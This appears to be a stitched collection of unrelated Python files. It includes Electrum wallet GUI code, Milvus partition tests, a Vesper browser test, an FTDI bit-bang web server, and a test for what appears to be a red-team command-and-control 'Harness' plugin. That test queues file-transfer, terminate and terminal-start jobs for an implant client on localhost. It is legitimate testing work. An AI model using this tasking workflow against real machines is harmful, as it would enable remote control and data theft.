self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
try:
new_path = self.wallet.save_backup()
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
test_partition.py
|
import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
TIMEOUT = 120
class TestCreateBase:
"""
******************************************************************
The following cases are used to test `create_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_a(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(600)
def test_create_partition_limit(self, connect, collection, args):
'''
target: test create partitions, check status returned
method: call function: create_partition for 4097 times
expected: exception raised
'''
threads_num = 8
threads = []
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
def create(connect, threads_num):
for i in range(max_partition_num // threads_num):
tag_tmp = gen_unique_str()
connect.create_partition(collection, tag_tmp)
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=create, args=(m, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
tag_tmp = gen_unique_str()
with pytest.raises(Exception) as e:
connect.create_partition(collection, tag_tmp)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_repeat(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
try:
connect.create_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: partition name = %s already exists" % default_tag
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_collection_not_existed(self, connect):
'''
target: test create partition, its owner collection name not existed in db, check status returned
method: call function: create_partition
expected: status not ok
'''
collection_name = gen_unique_str()
try:
connect.create_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_name_name_None(self, connect, collection):
'''
target: test create partition, tag name set None, check status returned
method: call function: create_partition
expected: status ok
'''
tag_name = None
try:
connect.create_partition(collection, tag_name)
except Exception as e:
assert e.args[0] == "`partition_name` value None is illegal"
@pytest.mark.tags(CaseLabel.L0)
def test_create_different_partition_names(self, connect, collection):
"""
target: test create partition twice with different names
method: call function: create_partition, and again
expected: status ok
"""
connect.create_partition(collection, default_tag)
tag_name = gen_unique_str()
connect.create_partition(collection, tag_name)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_default(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status not ok
'''
tag_new = "tag_new"
connect.create_partition(collection, default_tag)
ids = [i for i in range(default_nb)]
try:
connect.insert(collection, default_entities, partition_name=tag_new)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % tag_new
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_same_tags(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
ids = [(i+default_nb) for i in range(default_nb)]
new_result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([id_collection])
res = connect.get_collection_stats(id_collection)
assert res["row_count"] == default_nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
'''
target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
method: call function: create_partition
expected: status ok, collection length is correct
'''
connect.create_partition(collection, default_tag)
collection_new = gen_unique_str()
connect.create_collection(collection_new, default_fields)
connect.create_partition(collection_new, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
new_result = connect.insert(collection_new, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([collection, collection_new])
res = connect.get_collection_stats(collection)
assert res["row_count"] == default_nb
res = connect.get_collection_stats(collection_new)
assert res["row_count"] == default_nb
class TestShowBase:
"""
******************************************************************
The following cases are used to test `list_partitions` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partition first, then call function: list_partitions
expected: status ok, partition correct
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions_no_partition(self, connect, collection):
'''
target: test show partitions with collection name, check status and partitions returned
method: call function: list_partitions
expected: status ok, partitions correct
'''
res = connect.list_partitions(collection)
assert compare_list_elements(res, ['_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_show_multi_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partitions first, then call function: list_partitions
expected: status ok, partitions correct
'''
tag_new = gen_unique_str()
connect.create_partition(collection, default_tag)
connect.create_partition(collection, tag_new)
res = connect.list_partitions(collection)
assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_a(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
connect.create_partition(collection, default_tag)
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_multi_partitions(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
connect.create_partition(collection, tag_name)
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
res = connect.has_partition(collection, tag_name)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_name_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with tag not existed
expected: status ok, result empty
'''
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert not res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_collection_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with collection not existed
expected: status not ok
'''
collection_name = "not_existed_collection"
try:
connect.has_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "HasPartition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test has partition, with invalid tag name, check status returned
method: call function: has_partition
expected: status ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.has_partition(collection, tag_name)
class TestDropBase:
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_a(self, connect, collection):
'''
target: test drop partition, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
res1 = connect.list_partitions(collection)
assert default_tag in res1
connect.drop_partition(collection, default_tag)
res2 = connect.list_partitions(collection)
assert default_tag not in res2
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed(self, connect, collection):
'''
target: test drop partition, but tag not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_tag = "new_tag"
try:
connect.drop_partition(collection, new_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % new_tag
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed_A(self, connect, collection):
'''
target: test drop partition, but collection not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_collection = gen_unique_str()
try:
connect.drop_partition(new_collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: can't find collection: %s" % new_collection
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_repeatedly(self, connect, collection):
'''
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
connect.drop_partition(collection, default_tag)
time.sleep(2)
try:
connect.drop_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % default_tag
tag_list = connect.list_partitions(collection)
assert default_tag not in tag_list
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_create(self, connect, collection):
'''
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status not ok, partition in db
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
connect.drop_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), ['_default'])
time.sleep(2)
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test drop partition, with invalid collection name, check status returned
method: call function: drop_partition
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection_name, default_tag)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test drop partition, with invalid tag name, check status returned
method: call function: drop_partition
expected: status not ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection, tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test show partitions, with invalid collection name, check status returned
method: call function: list_partitions
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.list_partitions(collection_name)
class TestNewCase(object):
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_A(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_B(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
|
browserTest.py
|
#:copyright: Copyright 2009-2010 by the Vesper team, see AUTHORS.
#:license: Dual licenced under the GPL or Apache2 licences, see LICENSE.
import webbrowser, unittest
import multiprocessing, random, tempfile, os.path
from vesper.utils import Uri
from vesper.backports import json
from vesper import app
from vesper.web.route import Route
def startVesperInstance(port, queue):
try:
import coverage, sys, signal, atexit
coverage.process_startup()
def safeterminate(num, frame):
#coverage registers an atexit function
#so have atexit functions called when terminating
atexit._run_exitfuncs() #for some reason sys.exit isn't calling this
sys.exit()
signal.signal(signal.SIGTERM, safeterminate)
except ImportError:
pass
@app.Action
def sendServerStartAction(kw, retVal):
# print "startReplication callback!"
queue.put('server ready')
@Route('testresult')#, REQUEST_METHOD='POST')
def handleTestresult(kw, retval):
queue.put(json.loads(kw._postContent))
kw._responseHeaders['Content-Type'] = 'application/json'
return '"OK"'
tmpdir = tempfile.gettempdir()
print "creating vesper instance on port %d" % (port),'tmp at', tmpdir
app.createApp(__name__, 'vesper.web.admin', port=port, storage_url="mem://",
static_path='browser',
actions = {'load-model':[sendServerStartAction]},
template_path='browser/templates',
mako_module_dir = os.path.join(tmpdir, 'browserTest_makomodules')
).run()
# blocks forever
def startServer():
port = 5555 #random.randrange(5000,9999)
queue = multiprocessing.Queue()
serverProcess = multiprocessing.Process(target=startVesperInstance, args=(port,queue))
serverProcess.start()
return serverProcess, queue, port
def run():
serverProcess, queue, port = startServer()
queue.get(True, 5) #raise Queue.EMPTY if server isn't ready in 5 second
try:
serverProcess.join() #block
except:
serverProcess.terminate()
class BrowserTestRunnerTest(unittest.TestCase):
def testBrowserTests(self):
serverProcess, queue, port = startServer()
urls = ['static/db_tests.html', 'static/binder_tests.html','data_test.html']
try:
queue.get(True, 5) #raise Queue.EMPTY if server isn't ready in 5 second
for name in urls:
url = 'http://localhost:%d/%s' % (port, name)
print 'running ', url
webbrowser.open(url)
testResults = queue.get(True, 20) #raise Queue.EMPTY if browser unittests haven't finished in 20 seconds
print '%(total)d total, %(passed)d passed %(failed)d failed %(ignored)d ignored' % testResults
self.assertEqual(testResults['passed'], testResults['total'])
finally:
if not keepRunnng:
serverProcess.terminate()
else:
try:
serverProcess.join() #block
except:
serverProcess.terminate()
keepRunnng = False
if __name__ == '__main__':
import sys
if '--run' in sys.argv:
run()
sys.exit()
elif '--wait' in sys.argv:
keepRunnng = True
sys.argv.remove('--wait')
unittest.main()
|
bit_server.py
|
"""
bit_server.py - remote HTTP interface to bit-bangged FTDI port
This runs as a web server, connect to port 8008
Change HTTP_PORT for different port number or supply alternate as args[1]
Requires:
- pylibftdi
"""
import sys
import threading
import time
import webbrowser
from http.server import HTTPServer, BaseHTTPRequestHandler
from io import BytesIO
from socketserver import ThreadingMixIn
from pylibftdi import BitBangDevice
HTTP_PORT = 8008
class ThreadingServer(ThreadingMixIn, HTTPServer):
pass
def get_page():
port = switch.port
page = """
<!DOCTYPE html>
<html>
<head>
<title>%s - pylibftdi</title>
</head>
<body>
<div>
""" % port
for i in range(8):
bit = 7 - i
is_on = port & (1 << bit)
color = '#00FF00' if is_on else '#FF0000'
page += """
<fieldset style="background-color: %s; display: inline-block; margin:0px; padding: 8px;">
<form action="" method="post" >
<input type="checkbox" onchange="document.querySelector('[name=bit%d]').value=this.checked; document.forms[%d].submit()" %s />
<input type="hidden" name="bit%d" />
</form>
</fieldset>
""" % (color, bit, i, 'checked="checked"' if is_on else '', bit)
page += """
</div>
DATA=%s
</body>
</html>
""" % port
return page
class ReqHandler(BaseHTTPRequestHandler):
def do_GET(self):
f = self.send_head()
if f:
self.wfile.write(f.read())
f.close()
def do_POST(self):
length = self.headers['content-length']
nbytes = int(length)
query = self.rfile.read(nbytes).decode()
# this is lazy and fragile - assumes only a single
# query parameter XXX
if query.startswith('bit'):
bit = int(query[3])
value = 1 if query.rsplit('=', 1)[-1] == 'true' else 0
if value:
switch.port |= (1 << bit)
else:
switch.port &= 255 ^ (1 << bit)
f = self.send_head()
if f:
self.wfile.write(f.read())
f.close()
def send_head(self):
f = BytesIO()
f.write(get_page().encode())
length = f.tell()
f.seek(0)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", str(length))
self.end_headers()
return f
def runserver(port=HTTP_PORT):
serveraddr = ('', port)
srvr = ThreadingServer(serveraddr, ReqHandler)
srvr.serve_forever()
if __name__ == '__main__':
switch = BitBangDevice()
try:
HTTP_PORT = int(sys.argv[1])
except (ValueError, TypeError):
print("Usage: FtdiWebServer [portnumber]")
except IndexError:
pass
t = threading.Thread(target=runserver, args=(HTTP_PORT,))
t.setDaemon(True)
t.start()
print("Webserver running on localhost port %d" % HTTP_PORT)
time.sleep(0.5)
retry = 10
while retry:
try:
webbrowser.open('http://localhost:%d' % HTTP_PORT)
except EnvironmentError:
time.sleep(1)
retry -= 1
else:
break
# wait for Ctrl-C
try:
while 1:
time.sleep(100)
except KeyboardInterrupt:
pass
|
test_03_harness_app.py
|
"""Unit testing for the supervisor module.
"""
from multiprocessing import Pool, Process
from os import environ
from time import sleep
from pytest import fixture, raises
import docker
CLIENT = docker.from_env()
from src import controller_plugin
@fixture(scope="function")
def startup_brain():
old_log = environ.get("LOGLEVEL", "")
environ["LOGLEVEL"] = "DEBUG"
tag = environ.get("TRAVIS_BRANCH", "dev").replace("master", "latest")
CLIENT.containers.run(
"".join(("ramrodpcp/database-brain:", tag)),
name="rethinkdbtestapp",
detach=True,
ports={"28015/tcp": 28015},
remove=True,
)
sleep(3) #docker needs to start up the DB before sup starts up
yield
try:
environ["LOGLEVEL"] = old_log
containers = CLIENT.containers.list()
for container in containers:
if container.name == "rethinkdbtestapp":
container.stop()
break
except SystemExit:
pass
@fixture(scope="function")
def proc():
old_plugin = environ.get("PLUGIN", "")
old_plugin_name = environ.get("PLUGIN_NAME", "")
old_stage = environ.get("STAGE", "")
old_port = environ.get("PORT", "")
environ["PLUGIN"] = "Harness"
environ["PLUGIN_NAME"] = "Harness-5000tcp"
environ["STAGE"] = "TESTING"
environ["PORT"] = "5000"
import server
plugin_instance = server.get_class_instance("Harness")
process = Process(target=plugin_instance.start)
yield process
try:
process.terminate()
except:
pass
environ["PLUGIN"] = old_plugin
environ["PLUGIN_NAME"] = old_plugin_name
environ["STAGE"] = old_stage
environ["PORT"] = old_port
TEST_COMMANDS = [
{'Output': True,
'Inputs': [{'Tooltip': 'This string will be echoed back',
'Type': 'textbox',
'Name': 'EchoString',
'Value': 'Hello World!'}],
'Tooltip': '\nEcho\n\nClient Returns this string verbatim\n\nArguments:\n1. String to Echo\n\nReturns:\nString\n',
'CommandName': 'echo',
'OptionalInputs': []
},
{'Output': False,
'Inputs': [{'Tooltip': 'Integer number of miliseconds',
'Type': 'textbox',
'Name': 'SleepTime',
'Value': '1500'}],
'Tooltip': '',
'CommandName': 'sleep',
'OptionalInputs': []
},
{'Output': False,
'Inputs': [],
'Tooltip': '',
'CommandName': 'put_file',
'OptionalInputs': [{'Tooltip': '',
'Type': 'textbox',
'Name': 'file_id',
'Value': '399'},
{'Tooltip': '',
'Type': 'textbox',
'Name': 'filename',
'Value': 'test_file'}
]
},
{'Output': False,
'Inputs': [],
'Tooltip': '',
'CommandName': 'get_file',
'OptionalInputs': [{'Tooltip': '',
'Type': 'textbox',
'Name': 'fid',
'Value': '405'},
{'Tooltip': '',
'Type': 'textbox',
'Name': 'filename',
'Value': 'test_file'}]
},
{'Output': False,
'Inputs': [],
'Tooltip': '\nTerminate\n\nClient closes itself with exit code 0\n\nArguments:\nNone\n\nReturns:\nNone\n',
'CommandName': 'terminate',
'OptionalInputs': []
},
{'Output': False,
'Inputs': [],
'Tooltip': '',
'CommandName': 'terminal_start',
'OptionalInputs': []
},
]
def the_pretend_getter(client):
import requests
from requests.exceptions import ReadTimeout
from brain import rethinkdb as r
MAX_REQUEST_TIMEOUT = 120
try:
resp = requests.get("http://{}/harness/testing_testing_testing?args=First".format(client), timeout=MAX_REQUEST_TIMEOUT)
#better be a Echo Hello World!
print(resp.text)
assert("echo" in resp.text), "Expected First command to be echo"
requests.post("http://{}/response/testing_testing_testing".format(client), data={"data": resp.text[5:]}, timeout=MAX_REQUEST_TIMEOUT)
sleep(5) #make sure all the updates get made
conn = r.connect()
for doc in r.db("Brain").table("Outputs").run(conn):
assert (doc['Content'] == "Hello World!")
#confirm hello makes it to the database
resp = requests.get("http://{}/harness/testing_testing_testing?args=Second".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert("sleep" in resp.text), "Expected second command to be sleep"
sleep(3) #make sure all the updates get made
resp = requests.get("http://{}/harness/testing_testing_testing?args=Third".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
#confirm put_file
assert("put_file" in resp.text), "Expected second command to be put_file"
resp = requests.get("http://{}/givemethat/testing_testing_testing/399?args=Fourth".format(client), timeout=MAX_REQUEST_TIMEOUT)
sleep(3) #make sure all the updates get made
#confirm get_file makes it to the database
resp = requests.get("http://{}/harness/testing_testing_testing?args=Fifth".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert("get_file" in resp.text), "Expected second command to be get_file"
resp = requests.post("http://{}/givemethat/testing_testing_testing/401?args=Sixth".format(client), data={"data":"this is a file"}, timeout=MAX_REQUEST_TIMEOUT)
sleep(3) #make sure all the updates get made
resp = requests.get("http://{}/harness/testing_testing_testing?args=Seventh".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert("terminate" in resp.text), "Expected third command to be terminate"
sleep(3) # make sure all the updates get made
resp = requests.get("http://{}/harness/testing_testing_testing?args=Eight".format(client),
timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert ("terminal_start" in resp.text), "Expected third command to be terminal_start"
resp = requests.get("http://{}/harness/testing_testing_testing?args=NoCommandsForMe".format(client), timeout=MAX_REQUEST_TIMEOUT)
print(resp.text)
assert("sleep" in resp.text), "Server should respond with sleep if no other command provided"
assert("1000" in resp.text), "Sleep should be small now that terminal started"
sleep(3) #make sure all the updates get made
sleep(5) #make sure all the updates are made
for doc in r.db("Brain").table("Jobs").run(conn):
assert (doc['Status'] == "Done")
except AssertionError as e:
from sys import stderr
stderr.write("{}\n".format(e))
return False
except ReadTimeout:
#this is for manual debugging
sleep(300)
return False
return True
def the_pretend_app():
sleep(6)
with Pool(2) as p:
test_results = p.map(the_pretend_getter, ["127.0.0.1:5000"])
assert False not in test_results
def test_the_Harness_app(startup_brain, proc):
environ["STAGE"] = "TESTING"
environ["PORT"] = "5000"
proc.start()
sleep(3)
try:
from brain import connect, r
conn = connect()
sleep(5)
job_start = 0
for command in TEST_COMMANDS:
job_start += 1
job_target = {"PluginName": "Harness",
"Location": "127.0.0.1",
"Port": "5000"}
job = {"JobTarget": job_target,
"Status": "Ready",
"StartTime": job_start,
"JobCommand": command}
print(job)
r.db("Brain").table("Jobs").insert(job).run(conn)
sleep(4)
the_pretend_app()
sleep(5)
raise KeyboardInterrupt
except KeyboardInterrupt:
pass
finally:
try:
proc.terminate()
sleep(2)
except SystemExit as ex:
assert str(ex) == "0"
if __name__ == "__main__":
test_the_Harness_app()
|
node_test.py
|
# Lint as: python3
# Copyright 2020 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
